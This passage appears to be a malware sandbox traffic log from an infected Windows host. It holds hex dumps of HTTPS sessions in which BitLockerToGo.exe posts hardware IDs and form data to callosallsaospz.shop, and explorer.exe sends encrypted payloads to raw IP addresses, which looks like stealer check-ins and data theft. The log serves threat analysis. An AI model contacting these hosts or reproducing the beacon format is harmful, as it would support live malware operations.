                                                                                    2024-07-24 17:56:57 UTC4096INData Raw: 33 95 ce 64 b8 6e 4a 63 20 5a 89 ec 08 66 8d 4f d6 f5 94 60 1f 4a 69 7a 91 77 33 98 ce e1 73 f5 64 f9 52 17 f4 ec 11 ff 0d 2b 1b b7 5c 82 b9 83 4d 06 af b5 93 16 93 73 06 4a da 21 57 0e d0 d4 9e e4 fa f7 cb 46 51 28 9c f3 f6 26 d0 6a 7c aa d9 31 b5 3b ff 7d cb 79 6f d4 dd eb ed e7 31 d7 1e 41 6c 9c 8b fc 7f 85 a4 04 36 5d 41 e6 6e 44 2e 2d 14 7e ad 9c 70 7a 7e e5 31 7f c5 00 67 b5 90 1a ea ea ea ea ea ea ea ea e8 e9 e9 e9 e5 e6 e6 e6 e6 e6 e6 e6 e0 13 44 2f 56 22 5c 4e 1d e3 63 a0 71 d0 96 6e 78 69 bc ae ef 38 6c da c7 37 97 5e e2 c0 d1 91 6c de 28 53 5e fb b0 9c 48 d1 02 aa f8 a5 f3 52 1e c6 a3 90 9d ea bc ea 56 12 20 18 75 cb 1f 54 c6 e9 c3 dc eb 37 3b 32 ca d2 da 51 95 29 35 28 8e 30 e1 f1 c9 21 dc f4 12 04 2f f9 89 ad 07 e3 87 16 7a 85 5d d5 e8 2c 01
                                                                                    Data Ascii: 3dnJc ZfO`Jizw3sdR+\MsJ!WFQ(&j|1;}yo1Al6]AnD.-~pz~1gD/V"\Ncqnxi8l7^l(S^HRV uT7;2Q)5(0!/z],
                                                                                    2024-07-24 17:56:57 UTC4096INData Raw: 33 7a bc 50 22 52 fe a2 f8 c4 39 89 3f 2e b3 06 08 22 29 03 16 ca 97 fa fc ec cb 51 ad b4 e3 59 e8 e8 bd cc 9c a4 44 21 29 8f 90 c0 20 2c b5 46 f5 45 56 76 bd 24 35 12 10 a7 35 d7 08 20 36 69 79 3a 22 a3 79 ff 42 41 6f db 85 d3 ef 9b 60 55 f9 54 8a c2 72 9b 7d 54 31 eb dc dd 48 dc c5 49 8c 2c a0 65 61 e7 62 0d 64 c0 f9 be 99 1a 67 5d ea 32 e5 3d cf 89 03 e0 09 db 8e af d9 26 6e b6 8a ae df 68 1a be 7c 10 e4 5c 57 87 1e 20 02 ed 21 8c 01 fd f5 e3 93 62 56 48 53 d7 19 37 00 9f 42 f1 58 a5 c2 b5 61 3a f9 d7 fb f8 81 4c 18 8a ca 16 4d e5 59 cf 2f e4 0c a5 df 09 13 fc 1b d0 33 b0 a1 12 db fd 3c 03 81 b3 76 41 58 ff 5e 80 17 f4 3c 43 4e 55 da 72 3b 68 6c e6 a0 58 55 c7 6a c2 2b 97 6b 53 bf 9d 7c e8 61 47 e2 ed 07 35 e2 05 c1 5d e7 ae 3b a5 4d fd a7 3f 25 5d 9f
                                                                                    Data Ascii: 3zP"R9?.")QYD!) ,FEVv$55 6iy:"yBAo`UTr}T1HI,eabdg]2=&nh|\W !bVHS7BXa:LMY/3<vAX^<CNUr;hlXUj+kS|aG5];M?%]
                                                                                    2024-07-24 17:56:57 UTC4096INData Raw: 3d cd 6c 50 05 c1 90 f9 06 f1 67 cd c8 d2 23 5d 14 fe ee d9 c2 b5 3e 6e 71 71 cc f5 88 08 47 5b 04 c1 44 5c 8f 0b 5a 1f 96 70 7e fb 05 aa b8 f1 4c 3a 6f 3c e8 a1 d6 f5 91 60 4d 31 3c b9 44 32 47 5d 53 a4 d9 a8 2f a8 28 b5 e3 d2 c1 85 41 89 e0 3b 13 57 8f c5 4c 00 af 1d c0 97 54 25 95 13 2c 2f 72 31 b7 ef f4 4b 14 c3 03 7d ea 68 b1 62 c5 af 3f 21 19 5a d2 25 78 8f 6e 38 4d 89 27 13 3b 77 40 0a b7 47 1e 2c 80 7d 26 63 cb 15 8e 56 7c 85 40 80 57 d6 38 d9 bd 43 c8 72 f6 55 4b bf 28 3d d1 51 9f c2 e4 b3 20 48 f8 19 c7 60 04 c6 3f 2c 0a cf 2f 84 47 3a 0e 81 c7 80 3e 8c 55 4a a5 79 af 21 b1 08 fd 56 55 13 f2 ac 96 e3 5c dd 6b b0 c6 26 c4 12 77 5d 8b 5b 23 2d 97 ac b5 9a a1 e6 63 44 d1 6f 92 dc 97 06 a7 4e b4 97 55 dc be 7a 6a 16 6b c8 45 30 c2 40 7b 66 f3 cf 3a
                                                                                    Data Ascii: =lPg#]>nqqG[D\Zp~L:o<`M1<D2G]S/(A;WLT%,/r1K}hb?!Z%xn8M';w@G,}&cV|@W8CrUK(=Q H`?,/G:>UJy!VU\k&w][#-cDoNUzjkE0@{f:
                                                                                    2024-07-24 17:56:57 UTC4096INData Raw: 42 2f 38 dc 0f 26 2c e6 f7 ba 11 2e 00 f4 ca 5b de 37 06 33 99 8c 4f e9 32 9f 90 d8 f5 9b 8f c6 83 53 f0 f0 07 ff dd 71 a4 f2 63 ee ff 47 34 ad 89 c3 31 65 8f b4 fc dc 75 39 15 dc 3b 4a d9 aa 2f 79 ba ae 05 7a a2 c6 e9 a5 36 5c aa eb bf a3 22 42 59 64 a1 f1 c6 a9 43 41 b5 fc e9 75 85 c5 17 0c 95 26 59 3a 58 e6 49 1b 14 81 5f 74 e7 23 30 f6 7e f6 b4 dc f0 4c 8f 9f af ce bb 39 7d b8 0c 38 2c 3c 85 bf 73 89 15 05 d9 c7 ba 9c b0 b6 c7 06 26 f2 55 21 d3 e8 dd 23 fb 58 ab 31 f7 f1 2f 08 0b 84 52 0e 65 c5 d4 d5 cc 85 5c 7e 25 39 2b 97 b0 fd 15 5c a6 a6 29 65 e0 4c 80 4c 7c b6 a0 29 66 e5 a4 b5 7d 8f de f3 1c 55 68 d7 4b b2 1c 15 f8 6b 16 f3 6b 56 5b 29 d5 af 2c 62 11 75 4f 88 28 1d 01 5c 72 b1 4c fa 88 2c 6d 10 31 fe a6 e3 c9 fd f3 8a fd 1e e3 f2 9d 57 07 4c 53
                                                                                    Data Ascii: B/8&,.[73O2SqcG41eu9;J/yz6\"BYdCAu&Y:XI_t#0~L9}8,<s&U!#X1/Re\~%9+\)eLL|)f}UhKkkV[),buO(\rL,m1WLS
                                                                                    2024-07-24 17:56:57 UTC4096INData Raw: 0e 76 6b de 75 6e 21 70 29 8a 7a 31 f3 42 32 b6 49 e1 39 ac f9 c0 3f 5e 6b cf ce a1 c4 13 20 f4 96 f6 90 a8 7d ff 0f 2d e4 fd 74 e3 28 c4 d3 a4 83 f0 30 bd 5e 35 61 bd 64 6c 4a 98 8e 03 e9 e7 05 96 6f b4 12 12 89 9e 7b 1b 40 b5 7e 9b ee 82 1d ea ac cb eb 85 06 c0 2f cc 86 33 8e d7 97 b4 c6 82 20 54 76 54 8c af 89 09 69 bb 91 a2 ee 7c f8 e1 b4 32 0d 4c 5a 4f 74 f8 c3 10 ce 72 b4 cc f9 9d f6 57 9e 05 fe fc 21 9e 9c b7 9d 80 ac 8e 23 84 cc 0f be ac aa 0c bd 22 9a 24 ed 55 b5 b2 b2 7e ab b7 2e ab 93 60 d4 2c 1d 4b 67 0d 6d 0a c8 7e 7b 84 69 80 46 10 a4 e3 28 d1 3c 8b 77 14 8d b8 f4 c1 73 73 b8 b4 c6 77 e8 3d f2 b0 95 48 48 18 24 3c 8c 2f 5c 85 6c 71 e0 1a 52 82 c2 f7 04 c8 16 03 77 bd ea 37 7a 0e e1 1e 83 63 e5 ab e4 1d 2f 56 22 a4 ab 71 eb f7 7f 71 ab f2 79
                                                                                    Data Ascii: vkun!p)z1B2I9?^k }-t(0^5adlJo{@~/3 TvTi|2LZOtrW!#"$U~.`,Kgm~{iF(<wssw=HH$</\lqRw7zc/V"qqy
                                                                                    2024-07-24 17:56:57 UTC4096INData Raw: 61 44 99 ae d9 5f 85 61 f5 9a ae b4 27 63 28 9a e3 83 1c 5c 93 9e d9 a4 e0 ef 8b 92 20 f7 c5 6c b4 66 b5 3f dc b1 f4 f6 c4 46 c0 4d 59 9a 4c 9e 82 0a 05 f6 a8 b8 bb 46 f5 76 6b 3c 91 55 e6 c1 d1 aa 30 5b 35 05 ea b8 78 9d 48 d7 e3 2c 79 14 3e ad fa 94 8c a5 14 d8 23 52 d5 0d ee 34 f9 47 53 f7 63 6c 45 ae 5c 72 45 7b b9 64 83 ed 54 74 62 f3 54 87 71 3a a0 ba 5d 1e 9a 44 84 25 4c 29 11 85 62 28 86 c4 62 4d d5 3c f8 fa 12 75 d4 2c 7b 53 fb 08 b5 05 34 23 b3 36 45 35 e0 e7 67 5c 50 97 3f 4e 81 85 63 a9 22 b9 9c 03 6d 9a 53 9f 5d d7 2f e3 ef 69 7b ac de ac 89 67 c3 68 45 93 32 f9 61 e3 34 0b 87 95 47 00 ef c4 cc d6 ef ff 91 99 d2 25 27 05 96 11 b1 3d b9 88 c9 24 24 33 ed 57 59 5f e1 47 43 dc 39 fe 91 57 63 33 5e 48 e4 11 0a 02 d4 72 f4 ed da f1 25 78 7f d6 4a
                                                                                    Data Ascii: aD_a'c(\ lf?FMYLFvk<U0[5xH,y>#R4GSclE\rE{dTtbTq:]D%L)b(bM<u,{S4#6E5g\P?Nc"mS]/i{ghE2a4G%'=$$3WY_GC9Wc3^Hr%xJ
                                                                                    2024-07-24 17:56:57 UTC4096INData Raw: c6 9a 08 b4 f1 1f fe 00 fd 46 f6 8d 91 d7 25 3e 0d bb b8 2a 21 34 7f 26 7b d8 57 ea 8b f7 d4 dd 58 da 17 30 a7 07 70 66 05 33 de c5 86 42 1b c6 45 a9 3c dc dc 0b 07 c5 ad 5a a4 4c 86 2d 04 ba 90 3f fb 2c cd 71 25 2a 95 61 01 3b 85 d4 e5 9b 47 da 17 5a 13 71 e8 f5 ea f7 ef 53 e7 36 e6 cf d0 c9 1e 25 b7 79 66 93 a9 64 94 bc df 87 83 c0 4d 92 09 63 4e cc 7c c6 6c d1 78 1f 7c 2a be ad c7 bc 69 39 a7 c3 00 4a aa 0e 27 c1 0e 13 ec 8c bd 32 07 a0 0c b3 0b 16 f0 ff 57 42 e1 26 ec 71 b4 af 88 d3 13 0a 08 9f 0f 17 be d1 71 ef 82 06 8b 4d 52 1a 86 06 d6 b9 1f ae 05 4b 6d ca 31 67 fc 97 75 29 2a 72 bc 54 11 2c a8 ce 94 05 dc 54 a5 09 61 bc 9f e5 d1 7e fb 1a bd d3 eb 17 e9 e5 cc b9 c9 ce af 4f 84 ad da 97 12 2d 81 d4 5a 23 c4 15 9e ec 98 91 c6 16 eb 2d 6a e9 f5 4d 45
                                                                                    Data Ascii: F%>*!4&{WX0pf3BE<ZL-?,q%*a;GZqS6%yfdMcN|lx|*i9J'2WB&qqMRKm1gu)*rT,Ta~O-Z#-jME
                                                                                    2024-07-24 17:56:57 UTC4096INData Raw: 3a b1 f5 56 a3 46 09 66 0f 7c 4c 68 ea 1d 72 9d 06 f0 dd e5 73 ca d9 33 bc 95 e7 29 85 46 2e 9d a1 a4 9c 63 57 56 c6 c6 f4 4e 05 86 44 ea 37 65 30 84 79 0e f7 c8 84 b4 71 bf a2 de b1 b6 10 87 06 07 3c c9 76 a3 0a 7b 4f b7 1c 1c 66 da 89 8a d3 9e 10 3b 35 97 b2 1e 18 99 80 6e 22 b5 7f 7e 41 4a 3b 98 1b ae 71 de 60 d0 9d aa a6 73 c8 99 ce 00 6b 4e e5 c9 cf c7 04 a1 f0 49 64 6f 8b 8b 4f 01 9c c4 f3 ce 4b 1d d5 26 87 81 88 3c bf f2 b6 b3 f7 97 ee b1 1b 4f 8a 74 24 1d 92 1f 39 7d 2e c0 0d 9c 17 b6 d9 71 34 3f e0 78 cf a5 0e 4a 3f 57 9a eb 75 57 48 2c e4 f1 d5 b9 69 f1 41 3c 32 ff 23 ed 60 09 21 98 5e b9 9e ba 67 95 00 9d 25 f9 62 1d 1d 2a 4e ce bb 74 52 27 97 11 39 71 ac df 04 ca 34 71 9e 44 70 1a 53 8e 78 5f 07 6b 28 8b f1 b4 f8 8a 93 e3 13 27 0f 8d f1 c6 a2
                                                                                    Data Ascii: :VFf|Lhrs3)F.cWVND7e0yq<v{Of;5n"~AJ;q`skNIdoOK&<Ot$9}.q4?xJ?WuWH,iA<2#`!^g%b*NtR'9q4qDpSx_k('
                                                                                    2024-07-24 17:56:57 UTC4096INData Raw: 34 02 0a 6c 1e bc a6 59 40 b8 41 3d 0e 24 4e 66 dc 6d 19 d4 b0 73 28 7c b0 e5 f2 82 51 cf 80 02 43 34 45 2a 9a 8c 3c 60 2f d1 7b 7f 0b 5f 2a 3e 10 b3 8a ab 82 8b e6 6a f1 a1 5e 1b b8 8f 71 db 09 d9 be 39 83 6f 1e 51 d4 3c 3f 80 8c 5d 7a 31 6e b3 89 67 c0 30 d7 df c0 f0 1e ed e0 92 d9 a7 09 0f b6 9c 47 81 a8 12 48 60 10 4f 14 0c d3 15 ca 54 23 e5 5d 6e c5 03 e5 10 9a f0 3e b4 02 26 e8 b9 01 a6 65 79 5b 7b 66 b2 5c 70 b9 16 d5 26 f9 e8 5e e9 ea 5f 00 b7 73 25 b9 f9 5b 5e 3e 82 1f 48 f2 6c 61 0b cf e4 cd d2 33 e4 c8 4c 19 05 b7 09 57 69 33 c0 b2 9a 94 93 2b dd 7c 16 b4 60 18 99 a7 c8 d2 de 5c c7 7e 8b 11 30 93 37 15 e0 02 01 c1 b1 78 df f0 1c 5a 35 e4 ab 35 1b 06 54 d1 af 73 88 df e2 29 cb b9 b3 48 0a ab 78 5d 2b 7d 88 a5 e6 28 f3 1d 1d f6 db 5c 10 cd f6 2c
                                                                                    Data Ascii: 4lY@A=$Nfms(|QC4E*<`/{_*>j^q9oQ<?]z1ng0GH`OT#]n>&ey[{f\p&^_s%[^>Hla3LWi3+|`\~07xZ55Ts)Hx]+}(\,


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.1049765188.114.96.34434216C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:57 UTC286OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 20431
                                                                                    Host: callosallsaospz.shop
                                                                                    2024-07-24 17:56:57 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                                    2024-07-24 17:56:57 UTC5100OUTData Raw: 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00
                                                                                    Data Ascii: `?lpQ0/74G6(~`~O
                                                                                    2024-07-24 17:56:58 UTC814INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:56:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=g3nk6fe029livsrvt6n8cpnm8e; expires=Sun, 17-Nov-2024 11:43:37 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gR73HcGyEZMx14Hl9zmXJlB5SW%2F4pEvvrb928mQpx3Tws7fU7UPhKOfn%2FA%2FzEZMwpxtei%2BdZ4zC%2BiCCNO2HNBS2pqUIIXWRgN3qm0%2BLzTY8gTxN80xEWtzNjSv8msOb8xqxFE3Un1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85ca357eb5426a-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:56:58 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                                    Data Ascii: eok 8.46.123.33
                                                                                    2024-07-24 17:56:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.1049766107.173.160.1394433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:58 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.139
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:56:58 UTC1122OUTData Raw: 6e 38 69 77 33 4b 64 37 6e 58 34 59 2f 78 63 43 38 2b 62 75 54 77 51 32 76 56 5a 69 30 59 55 57 68 55 54 50 6e 51 62 74 7a 32 54 51 6e 48 48 46 30 77 44 37 6a 52 69 4b 44 64 51 31 54 4d 52 48 63 6e 48 5a 6d 76 76 49 4d 55 33 73 44 44 4c 79 62 61 2b 33 30 44 31 69 6c 2f 48 52 4d 52 79 66 70 51 59 6c 56 4c 69 65 38 73 75 67 67 53 45 52 77 35 6d 43 41 30 51 6c 55 39 48 69 74 34 6e 4a 32 4a 44 42 53 34 70 62 35 6b 30 79 31 66 2f 56 4c 2b 37 49 76 30 79 59 4f 4d 69 61 64 56 5a 6c 48 70 5a 68 51 37 52 6a 6f 52 38 66 62 63 35 57 6a 57 71 4f 30 5a 78 42 48 71 4e 4a 49 35 56 46 49 45 58 36 42 71 51 72 71 74 43 32 68 48 6e 53 50 50 39 30 4b 62 77 6e 6f 4f 38 4c 52 6e 6b 72 62 2b 79 38 79 77 56 51 6f 76 65 43 51 6b 58 66 72 4e 43 67 57 68 77 56 49 6b 4b 70 6a 58 69
                                                                                    Data Ascii: n8iw3Kd7nX4Y/xcC8+buTwQ2vVZi0YUWhUTPnQbtz2TQnHHF0wD7jRiKDdQ1TMRHcnHZmvvIMU3sDDLyba+30D1il/HRMRyfpQYlVLie8suggSERw5mCA0QlU9Hit4nJ2JDBS4pb5k0y1f/VL+7Iv0yYOMiadVZlHpZhQ7RjoR8fbc5WjWqO0ZxBHqNJI5VFIEX6BqQrqtC2hHnSPP90KbwnoO8LRnkrb+y8ywVQoveCQkXfrNCgWhwVIkKpjXi
                                                                                    2024-07-24 17:57:00 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:59 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:57:00 UTC685INData Raw: 68 54 6d 67 32 59 76 6f 6a 6a 6d 49 4d 46 49 62 49 2b 6c 56 50 73 53 34 75 74 53 4b 74 48 58 42 64 49 75 78 61 46 6d 68 6e 76 6d 65 6c 4d 6b 49 43 33 48 62 58 55 54 70 4f 53 38 5a 47 62 75 61 4b 42 4a 64 37 35 50 56 6e 4f 47 2b 59 79 30 53 6c 46 55 36 6a 37 4f 73 48 4f 77 33 4e 4a 33 5a 52 6f 2b 65 59 6f 62 6e 45 79 44 78 46 66 6a 34 7a 7a 4c 57 76 79 55 64 64 41 47 71 46 6f 53 53 6e 74 5a 71 41 75 70 35 36 52 45 45 56 79 7a 31 39 66 67 32 70 45 65 75 50 44 35 63 48 49 72 74 66 4f 63 39 77 2f 4f 67 68 4b 63 67 51 33 73 5a 30 67 56 32 59 56 55 50 52 4c 4b 74 74 53 74 2f 41 34 57 30 75 6e 56 4b 7a 48 4a 6a 50 53 4a 67 33 68 56 78 4d 42 70 50 6a 45 76 62 4a 31 77 36 75 4e 76 4a 6e 66 78 61 30 66 37 6a 74 2b 4c 35 55 73 54 66 52 2b 33 56 46 66 63 41 67 42 77
                                                                                    Data Ascii: hTmg2YvojjmIMFIbI+lVPsS4utSKtHXBdIuxaFmhnvmelMkIC3HbXUTpOS8ZGbuaKBJd75PVnOG+Yy0SlFU6j7OsHOw3NJ3ZRo+eYobnEyDxFfj4zzLWvyUddAGqFoSSntZqAup56REEVyz19fg2pEeuPD5cHIrtfOc9w/OghKcgQ3sZ0gV2YVUPRLKttSt/A4W0unVKzHJjPSJg3hVxMBpPjEvbJ1w6uNvJnfxa0f7jt+L5UsTfR+3VFfcAgBw


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.1049767188.114.96.34434216C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:59 UTC285OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 1225
                                                                                    Host: callosallsaospz.shop
                                                                                    2024-07-24 17:56:59 UTC1225OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 32 43 31 31 34 37 36 39 45 35 39 41 33 36 30 44 33 46 41 41 41 31 42 35 30 38 44 46 37 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8F2C114769E59A360D3FAAA1B508DF78--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                                    2024-07-24 17:57:00 UTC810INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:57:00 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=6o1u9q3s2mbtqo318khe3bnsn3; expires=Sun, 17-Nov-2024 11:43:39 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4pJbBR4nMeH%2F2toWRDefiqtPqRPeGZda6UVKKQxTOJ7oSjEmNLUMDq18cUcDVXOSFOAwlArDt4wGz8R52eJ%2Fl6bBUdKtGprsCIgsBem%2FU2F3%2FH7IIFXKJ3xru5lulgUqUaypxgR5ew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85ca428f4332e2-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:57:00 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                                    Data Ascii: eok 8.46.123.33
                                                                                    2024-07-24 17:57:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.1049768167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:57:00 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:57:00 UTC1122OUTData Raw: 70 4d 78 63 4a 57 77 69 64 71 68 48 38 4f 33 6b 4e 77 64 5a 41 38 58 30 4b 4b 78 70 7a 4b 2f 65 5a 64 66 47 72 68 46 63 77 37 64 52 59 71 35 44 4f 47 58 30 52 30 64 2b 38 4b 4a 2b 44 76 6c 6e 58 63 65 46 37 32 35 4c 58 73 77 30 69 4b 31 71 38 50 4e 35 65 55 77 57 72 4a 4e 41 62 37 4c 35 73 65 6d 7a 4e 61 76 73 37 44 36 76 65 74 59 51 6c 38 4f 63 32 56 30 6f 36 77 4a 68 4b 70 46 54 53 71 78 77 47 41 47 64 76 6f 4d 79 6a 6e 79 35 31 69 48 48 6d 37 43 54 30 4f 38 38 62 4b 59 6b 72 2f 5a 65 4a 71 64 4c 74 35 59 62 65 69 31 4a 4e 58 49 69 46 5a 70 57 50 50 68 6b 76 43 50 32 69 4d 4d 38 57 66 49 36 51 32 45 5a 59 5a 54 57 35 53 46 65 76 47 4f 6d 4b 6f 2f 51 49 4d 7a 7a 42 48 7a 36 36 42 34 4c 4a 72 57 2b 75 57 43 62 76 6c 58 76 74 5a 34 36 2f 76 76 48 4d 79 57
                                                                                    Data Ascii: pMxcJWwidqhH8O3kNwdZA8X0KKxpzK/eZdfGrhFcw7dRYq5DOGX0R0d+8KJ+DvlnXceF725LXsw0iK1q8PN5eUwWrJNAb7L5semzNavs7D6vetYQl8Oc2V0o6wJhKpFTSqxwGAGdvoMyjny51iHHm7CT0O88bKYkr/ZeJqdLt5Ybei1JNXIiFZpWPPhkvCP2iMM8WfI6Q2EZYZTW5SFevGOmKo/QIMzzBHz66B4LJrW+uWCbvlXvtZ46/vvHMyW
                                                                                    2024-07-24 17:57:01 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:57:01 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
